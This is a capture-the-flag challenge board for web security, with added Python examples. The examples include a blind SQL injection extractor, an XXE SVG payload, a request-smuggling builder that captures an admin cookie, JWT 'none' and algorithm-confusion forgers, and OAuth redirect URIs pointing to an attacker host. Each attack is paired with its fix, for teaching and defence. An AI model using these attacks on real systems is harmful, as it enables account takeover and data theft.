Challenges

Web Easy

Cookie Manipulation

A simple web application that uses cookies to determine user role. The cookie is not encrypted or signed - can you modify it to gain admin access?

Learning Objectives:
- Understanding HTTP cookies
- Browser developer tools
- Cookie manipulation techniques
- Importance of cookie security

Skills Required:
- Basic web browsing
- Browser DevTools

Skills Learned:
- Cookie inspection and modification
- Session management basics
- Client-side security failures

50 pts
16 solves 🩸
Web Easy

Cookie Monster

A login portal that grants guest access. Admin privileges reveal the flag. Analyze HTTP cookies.

100 pts
7 solves 🩸
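Both Cookie Manipulation and Cookie Monster come down to the same server-side mistake: reading a role straight out of a cookie the client controls. The block below is an added example (not challenge code) that shows that vulnerable parsing next to an HMAC-signed cookie built from the standard library; the cookie name `role`, the `|` separator and the secret are assumptions for the example.

```python
import base64
import hashlib
import hmac
from http.cookies import SimpleCookie

# Server-side secret, constructed for this example. A real deployment uses a
# random key kept outside the code base.
SECRET_KEY = b"constructed-server-secret-do-not-reuse"


def role_from_cookie_vulnerable(cookie_header: str) -> str:
    """VULNERABLE: the role is whatever the client wrote into the cookie.

    Editing 'role=guest' to 'role=admin' in DevTools is the whole attack.
    """
    jar = SimpleCookie()
    jar.load(cookie_header)
    return jar["role"].value if "role" in jar else "guest"


def _mac(value: str) -> str:
    """HMAC-SHA256 tag over the cookie value, base64url without padding."""
    tag = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag).rstrip(b"=").decode()


def issue_role_cookie(role: str) -> str:
    """Server issues 'role=<role>|<tag>'. The client can read the role but
    cannot produce a valid tag for a different role without SECRET_KEY."""
    return f"role={role}|{_mac(role)}"


def role_from_cookie_signed(cookie_header: str) -> str:
    """FIXED: honour the role only if its tag verifies; otherwise treat as guest."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    if "role" not in jar or "|" not in jar["role"].value:
        return "guest"
    role, tag = jar["role"].value.rsplit("|", 1)
    if not hmac.compare_digest(tag, _mac(role)):
        return "guest"  # tampered or forged
    return role


def demo() -> dict:
    """Constructed traffic: a guest edits the cookie to claim admin."""
    tampered_plain = "role=admin"
    signed_guest = issue_role_cookie("guest")
    tampered_signed = signed_guest.replace("role=guest", "role=admin")
    return {
        "plain_tampered": role_from_cookie_vulnerable(tampered_plain),
        "signed_honest": role_from_cookie_signed(signed_guest),
        "signed_tampered": role_from_cookie_signed(tampered_signed),
        "signed_admin": role_from_cookie_signed(issue_role_cookie("admin")),
    }
```

Signing stops tampering, but the cookie is still readable and replayable; storing only an opaque session id and keeping the role server-side avoids exposing the claim at all.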
Web Easy

JWT Algorithm Confusion

A simple web API that uses JWT tokens for authentication. The developer trusted the algorithm field in the JWT header. Can you forge an admin token?

100 pts
13 solves 🩸
Web Easy

Robots.txt Disclosure

Find the information disclosure bug.

50 pts
11 solves 🩸
Web Easy

Stored XSS Comment Board

Inject JavaScript to steal the admin's cookie.

150 pts
12 solves 🩸
Web Medium

Blind SQL Injection

A login form vulnerable to SQL injection. However, error messages are suppressed. You'll need to use time-based blind SQLi to extract the admin password. The database contains a 'secrets' table with a 'flag' column.

250 pts
10 solves 🩸
Web Medium

GraphQL Introspection Leak

A GraphQL API endpoint has introspection enabled in production. The schema exposes a hidden adminUser query that returns a flag field — but only when called with a specific internal header the developer forgot to document. Discover the field via introspection, then figure out the header.

300 pts
2 solves 🩸
Web Medium

SQLi Shop

An e-commerce search feature vulnerable to SQL injection. A secrets table hides the flag.

250 pts
5 solves 🩸
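Blind SQL Injection and SQLi Shop differ only in how much the server gives back: the shop search returns rows, so a UNION pulls the secrets table directly, while the login form only answers yes or no, so each byte has to be inferred. The block below is an added example (not challenge code) against an in-memory SQLite database with constructed contents. It uses the row/no-row signal as the oracle; the time-based variant the login challenge calls for swaps that signal for response latency (a conditional `SLEEP()`-style call on databases that have one; SQLite does not) and leaves the extraction loop unchanged. Table and column names other than `secrets`/`flag` are assumptions.

```python
import sqlite3
from typing import Callable


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database (constructed contents)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cr3t!'), ('guest', 'guest');
        CREATE TABLE products(name TEXT, price REAL);
        INSERT INTO products VALUES ('mug', 8.5), ('shirt', 19.0);
        CREATE TABLE secrets(flag TEXT);
        INSERT INTO secrets VALUES ('flag{constructed_example}');
    """)
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """VULNERABLE: string concatenation. Errors are swallowed, so the only
    signal the attacker gets is 'logged in' vs 'not logged in'."""
    query = (f"SELECT 1 FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def login_fixed(conn, username: str, password: str) -> bool:
    """FIXED: parameterised query; input can never change the SQL structure."""
    query = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def search_vulnerable(conn, term: str) -> list:
    """VULNERABLE shop search: results are returned, so a UNION can pull rows
    from any table with a matching column count."""
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(query).fetchall()


def search_fixed(conn, term: str) -> list:
    query = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(query, (f"%{term}%",)).fetchall()


Login = Callable[[sqlite3.Connection, str, str], bool]


def oracle(login: Login, conn, condition: str) -> bool:
    """One yes/no question. The trailing '-- ' comments out the password check."""
    return login(conn, f"admin' AND ({condition})-- ", "irrelevant")


def extract(login: Login, conn, expr: str, max_len: int = 64) -> str:
    """Recover a scalar subquery's value one character at a time with a binary
    search over the code point (7 questions per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(login, conn, f"length(({expr})) >= {pos}"):
            break  # past the end of the value (or the oracle is dead)
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(login, conn, f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out
```

Against the parameterised login the oracle never answers yes, so `extract` returns an empty string on the first length probe; that is the behaviour to expect when confirming a fix.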
Web Medium

SSTI Greet

A Flask greeting app that renders user input as a Jinja2 template. Exploit Server-Side Template Injection.

300 pts
6 solves 🩸
Web Medium

XXE via SVG Upload

A profile picture upload endpoint accepts SVG files and renders them server-side to PNG using librsvg. SVGs are XML — inject an XXE payload to read /etc/flag from the server's filesystem. The rendered PNG is returned directly in the response.

350 pts
2 solves 🩸
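An SVG is XML, so an upload can carry a DOCTYPE with an external entity that the renderer's XML parser resolves before any pixels are drawn. The block below is an added example, not challenge code: it constructs the kind of SVG the challenge wants, then shows a standard-library pre-check an upload handler can run before calling the renderer, which refuses any document declaring a DTD and, separately, lists the SYSTEM identifiers an upload declares without resolving them. The file contents and `/etc/flag` path follow the challenge text; nothing here reproduces librsvg itself.

```python
import xml.parsers.expat


class DtdFound(Exception):
    """Raised from an expat handler to stop parsing the moment a DTD shows up."""


# Constructed upload: the <text> node expands an external entity that points at
# /etc/flag, so a renderer that resolves entities draws the file's contents.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/flag"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
  <text x="0" y="20">&xxe;</text>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8">
  <rect width="8" height="8" fill="#09f"/>
</svg>"""


def svg_is_dtd_free(data: bytes) -> bool:
    """Gate to run before handing an upload to the renderer: True only for
    well-formed XML that declares no DOCTYPE and no entity."""
    parser = xml.parsers.expat.ParserCreate()

    def refuse(*_args):
        raise DtdFound

    parser.StartDoctypeDeclHandler = refuse
    parser.EntityDeclHandler = refuse
    try:
        parser.Parse(data, True)
    except (DtdFound, xml.parsers.expat.ExpatError):
        return False
    return True


def declared_external_entities(data: bytes) -> list:
    """Triage helper: (entity name, SYSTEM id) pairs the upload declares.
    Parsing stops when the DTD ends, so no reference is ever resolved."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity(name, _is_param, _value, _base, system_id, _public_id, _notation):
        if system_id:
            found.append((name, system_id))

    def stop(*_args):
        raise DtdFound

    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = stop
    try:
        parser.Parse(data, True)
    except (DtdFound, xml.parsers.expat.ExpatError):
        pass
    return found
```

Rejecting every DTD is deliberately blunt: some authoring tools emit a harmless `<!DOCTYPE svg PUBLIC ...>` header, and those files will be refused too. The real fix sits in the renderer's XML parser configuration (no entity resolution, no network access); the gate above is defence in depth for when that configuration is not under your control.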
Web Hard

HTTP Request Smuggling

A reverse proxy (HAProxy) and a backend (Gunicorn) disagree on how to parse Transfer-Encoding vs Content-Length headers. Smuggle a request to poison the backend queue and steal the admin session cookie from their next request. The challenge server processes admin requests every 15 seconds.

450 pts
1 solve 🩸
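Request smuggling works because two parsers draw the request boundary at different byte offsets. The block below is an added example, not challenge code and not a reproduction of HAProxy's or Gunicorn's actual parsers: it assumes the CL.TE direction (front end honours Content-Length, back end honours Transfer-Encoding; the TE.CL case is the mirror image), feeds the same bytes through both framings, and shows the smuggled `POST /comment` swallowing the head of the admin's next request, cookie included. The `/comment` endpoint, the `text=` field and the 77-byte capture length are the attacker's assumptions in the example.

```python
# Constructed admin request that the front end forwards 15 seconds later.
ADMIN_REQUEST = (b"GET /admin HTTP/1.1\r\n"
                 b"Host: target\r\n"
                 b"Cookie: session=ADMIN_SESSION_TOKEN\r\n"
                 b"\r\n")


def build_attack(capture_len: int) -> bytes:
    """Outer request: Content-Length covers everything, so the front end sees
    one request. Transfer-Encoding ends the body at '0\\r\\n\\r\\n', so the back
    end sees a second, unfinished POST whose body will be filled by whatever
    bytes arrive next on the same connection."""
    smuggled = (b"POST /comment HTTP/1.1\r\n"
                b"Host: target\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: %d\r\n\r\n"
                b"text=" % capture_len)
    body = b"0\r\n\r\n" + smuggled
    return (b"POST / HTTP/1.1\r\n"
            b"Host: target\r\n"
            b"Content-Length: %d\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" % len(body)) + body


def parse_requests(buf: bytes, prefer_te: bool) -> list:
    """Split a byte stream into requests, using chunked framing when the
    message carries Transfer-Encoding and prefer_te is set, else Content-Length."""
    requests = []
    while buf:
        head, sep, rest = buf.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete header block; a real server would keep reading
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            if b":" in line:
                k, v = line.split(b":", 1)
                headers[k.strip().lower()] = v.strip()
        chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        if chunked and prefer_te:
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line, 16)
                if size == 0:
                    rest = rest[2:]  # CRLF that terminates the last chunk
                    break
                body, rest = body + rest[:size], rest[size + 2:]
        else:
            length = int(headers.get(b"content-length", b"0"))
            body, rest = rest[:length], rest[length:]
        requests.append({"line": lines[0], "headers": headers, "body": body})
        buf = rest
    return requests


def has_conflicting_framing(raw: bytes) -> bool:
    """Hardening check for either hop: both Content-Length and Transfer-Encoding
    present means the framing is ambiguous (RFC 7230 s3.3.3); the safe choice is
    to reject the request rather than pick a winner."""
    head = b"\r\n" + raw.partition(b"\r\n\r\n")[0].lower()
    return b"\r\ncontent-length:" in head and b"\r\ntransfer-encoding:" in head


def simulate(capture_len: int = 77) -> dict:
    attack = build_attack(capture_len)
    frontend = parse_requests(attack, prefer_te=False)
    # The back end's socket now holds the attack followed by the admin's request.
    backend = parse_requests(attack + ADMIN_REQUEST, prefer_te=True)
    return {"frontend_saw": len(frontend), "backend": backend}
```

The capture length is the attacker's guess at how much of the victim's request to absorb; in the real challenge it is tuned until the stored comment contains the `Cookie:` line, and setting it too large makes the back end wait for bytes that never come.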
Web Hard

JWT Auth

A JWT authentication portal. The server accepts the 'none' algorithm, allowing unsigned token forgery.

400 pts
6 solves 🩸
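JWT Algorithm Confusion and JWT Auth share one root cause: the verifier lets the token's own header choose the algorithm. With `none` accepted there is nothing to forge; with the algorithm unpinned and a single key parameter reused for every algorithm, an attacker re-signs the token as HS256 using the server's public key as the HMAC secret. The block below is an added example (not challenge code) covering both, with a verifier that trusts the header next to one that pins RS256. The RSA key is a toy built from two Mersenne primes and the signature is textbook RSA over the reduced SHA-256 digest, so that the example runs without a crypto library; the published key format is invented for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Toy RSA key from two known Mersenne primes (constructed for this example).
# Real RS256 uses 2048+ bit keys and PKCS#1 v1.5 padding; textbook RSA is
# used here only to stay dependency-free.
_P = (1 << 127) - 1
_Q = (1 << 89) - 1
RSA_N = _P * _Q
RSA_E = 65537
_RSA_D = pow(RSA_E, -1, (_P - 1) * (_Q - 1))  # private exponent, server-side only

# What the server publishes (JWKS endpoint, docs): the attacker can fetch it.
PUBLIC_KEY_TEXT = f"RSA-PUBLIC n={RSA_N} e={RSA_E}"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_input(header: dict, claims: dict) -> bytes:
    def enc(obj: dict) -> str:
        return _b64url(json.dumps(obj, separators=(",", ":")).encode())
    return f"{enc(header)}.{enc(claims)}".encode()


def _digest_int(data: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def _parse_public(key_text: str):
    n, e = (int(part.split("=", 1)[1]) for part in key_text.split()[1:])
    return n, e


def issue_rs256(claims: dict) -> str:
    """Server-side issuance with the private exponent."""
    si = _signing_input({"alg": "RS256", "typ": "JWT"}, claims)
    sig = pow(_digest_int(si, RSA_N), _RSA_D, RSA_N)
    return si.decode() + "." + _b64url(sig.to_bytes((RSA_N.bit_length() + 7) // 8, "big"))


def forge(claims: dict, alg: str, hmac_key: bytes = b"") -> str:
    """Attacker side: 'none' needs no key; 'HS256' is signed with whatever the
    attacker expects the verifier to use as its HMAC secret."""
    si = _signing_input({"alg": alg, "typ": "JWT"}, claims)
    if alg == "none":
        return si.decode() + "."
    return si.decode() + "." + _b64url(hmac.new(hmac_key, si, hashlib.sha256).digest())


def _claims_if(ok: bool, claims_b64: str) -> Optional[dict]:
    return json.loads(_b64url_decode(claims_b64)) if ok else None


def verify_trusting_header(token: str, key_text: str) -> Optional[dict]:
    """VULNERABLE: the header picks the algorithm and one key serves them all."""
    h, c, s = token.split(".")
    si = f"{h}.{c}".encode()
    alg = json.loads(_b64url_decode(h)).get("alg")
    if alg == "none":  # JWT Auth: unsigned token accepted as-is
        return _claims_if(True, c)
    if alg == "HS256":  # JWT Algorithm Confusion: public key used as HMAC secret
        expected = hmac.new(key_text.encode(), si, hashlib.sha256).digest()
        return _claims_if(hmac.compare_digest(expected, _b64url_decode(s)), c)
    if alg == "RS256":
        n, e = _parse_public(key_text)
        sig = int.from_bytes(_b64url_decode(s), "big")
        return _claims_if(pow(sig, e, n) == _digest_int(si, n), c)
    return None


def verify_pinned(token: str, key_text: str) -> Optional[dict]:
    """FIXED: the server decides the algorithm; the header merely has to agree."""
    h, c, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != "RS256":
        return None
    n, e = _parse_public(key_text)
    sig = int.from_bytes(_b64url_decode(s), "big")
    return _claims_if(pow(sig, e, n) == _digest_int(f"{h}.{c}".encode(), n), c)


def demo() -> dict:
    admin = {"sub": "guest", "role": "admin"}
    legit = issue_rs256({"sub": "guest", "role": "user"})
    none_token = forge(admin, "none")
    confused = forge(admin, "HS256", PUBLIC_KEY_TEXT.encode())
    return {
        "legit_vuln": verify_trusting_header(legit, PUBLIC_KEY_TEXT),
        "none_vuln": verify_trusting_header(none_token, PUBLIC_KEY_TEXT),
        "confusion_vuln": verify_trusting_header(confused, PUBLIC_KEY_TEXT),
        "legit_fixed": verify_pinned(legit, PUBLIC_KEY_TEXT),
        "none_fixed": verify_pinned(none_token, PUBLIC_KEY_TEXT),
        "confusion_fixed": verify_pinned(confused, PUBLIC_KEY_TEXT),
    }
```

With a real library the fix is the same shape: pass an explicit allow-list of algorithms to the decode call and give HMAC verifiers a symmetric secret, never a public key.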
Web Hard

OAuth Token Hijack

A web app implements OAuth 2.0 with an open redirect in the redirect_uri validation — it only checks that the URI starts with the registered domain. The authorization server reflects the code in the URL. Steal the authorization code via the open redirect and exchange it for an admin token.

400 pts
1 solve 🩸
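The weak check here is a string prefix test on `redirect_uri`, which lets the attacker supply a URI that starts with the registered origin but delivers the reflected code somewhere else. The block below is an added example (not challenge code) with a prefix-checking validator, an exact-match validator, and a toy authorization endpoint that reflects the code onto whichever redirect the validator accepted; the registered URI, hostnames and code value are constructed.

```python
from typing import Callable, Optional
from urllib.parse import urlencode, urlsplit

# Registered for the client at enrolment time (constructed).
REGISTERED_REDIRECTS = ("https://app.example/callback",)


def redirect_ok_vulnerable(redirect_uri: str) -> bool:
    """VULNERABLE: prefix test on the raw string, as the challenge describes."""
    return redirect_uri.startswith("https://app.example")


def redirect_ok_fixed(redirect_uri: str) -> bool:
    """FIXED: exact string comparison against the registered URIs
    (RFC 6749 s3.1.2.3 requires simple string comparison when the full
    redirect URI is registered)."""
    return redirect_uri in REGISTERED_REDIRECTS


def authorize(redirect_uri: str, validator: Callable[[str], bool]) -> Optional[str]:
    """Authorization endpoint after user consent: build the Location header
    that carries the code back to redirect_uri. Code value is constructed."""
    if not validator(redirect_uri):
        return None
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return redirect_uri + sep + urlencode({"code": "c0nstructed-auth-code", "state": "xyz"})


def code_lands_on(validator: Callable[[str], bool], redirect_uri: str) -> Optional[str]:
    """Hostname that ends up receiving the authorization code, or None if refused."""
    location = authorize(redirect_uri, validator)
    return urlsplit(location).hostname if location else None


# Constructed attacker-controlled redirect URIs; every one passes the prefix test.
ATTACKER_URIS = (
    "https://app.example.attacker.tld/collect",  # registered host is a prefix of the attacker's
    "https://app.example@attacker.tld/collect",  # 'app.example' parses as userinfo; host is attacker.tld
)
```

Exact matching closes the prefix hole; PKCE on top of it means a leaked code is useless without the verifier the attacker never saw, which is why the Security BCP asks for both.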
Web Insane

SSRF + RCE Chain

A URL fetcher with an internal metadata service. Chain SSRF to reach the internal service, then use a custom header to achieve RCE and read the flag file.

500 pts
5 solves 🩸